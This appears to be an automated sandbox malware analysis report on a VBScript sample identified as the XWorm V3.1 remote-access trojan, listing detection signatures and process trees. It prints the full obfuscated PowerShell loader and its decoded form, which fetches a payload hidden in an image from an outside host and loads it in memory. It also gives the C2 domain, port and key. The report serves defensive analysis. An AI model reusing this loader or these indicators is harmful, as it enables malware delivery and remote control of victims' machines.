Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
72625413524.vbs

Overview

General Information

Sample name:72625413524.vbs
Analysis ID:1430116
MD5:2112af95545ceb1de9cca9495afc9a05
SHA1:1f0bcb7572c48c9ffd5bdff0c1afd1ef4afc614d
SHA256:b8d2261380dd02c1d624dc813bdd2cf294ebe902e3c1405036b690230bd66fb0
Tags:vbs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected XWorm
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2624 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwByDgTreG8DgTrecgByDgTreGUDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTreZQBwDgTreG8DgTrecgByDgTreGUDgTreaDgTreB0DgTreG4DgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreXwBGDgTreGkDgTrebDgTreBlDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 3608 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • wscript.exe (PID: 5336 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 4708 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
{"C2 url": ["aprilxrwonew8450.duckdns.org"], "Port": "8450", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6ec4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6f61:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7076:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6b70:$cnc4: POST / HTTP/1.1
    00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: powershell.exe PID: 6528JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 6528INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xbd223:$b2: ::FromBase64String(
        • 0xbe6db:$b2: ::FromBase64String(
        • 0xbecf1:$b2: ::FromBase64String(
        • 0xbf429:$b2: ::FromBase64String(
        • 0xbf9f6:$b2: ::FromBase64String(
        • 0xbd088:$b3: ::UTF8.GetString(
        • 0xbe540:$b3: ::UTF8.GetString(
        • 0xbeb56:$b3: ::UTF8.GetString(
        • 0xbf28e:$b3: ::UTF8.GetString(
        • 0xbf85b:$b3: ::UTF8.GetString(
        • 0x524ac:$s1: -join
        • 0x5ad8f:$s1: -join
        • 0x978c:$s3: reverse
        • 0x13653:$s3: reverse
        • 0x125944:$s3: reverse
        • 0x125c32:$s3: reverse
        • 0x12634c:$s3: reverse
        • 0x126b05:$s3: reverse
        • 0x12dca0:$s3: reverse
        • 0x12e0ba:$s3: reverse
        • 0x12ec42:$s3: reverse
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        7.2.RegAsm.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          7.2.RegAsm.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x70c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x7161:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x7276:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6d70:$cnc4: POST / HTTP/1.1
          SourceRuleDescriptionAuthorStrings
          amsi64_6412.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Spreading

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }",

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjD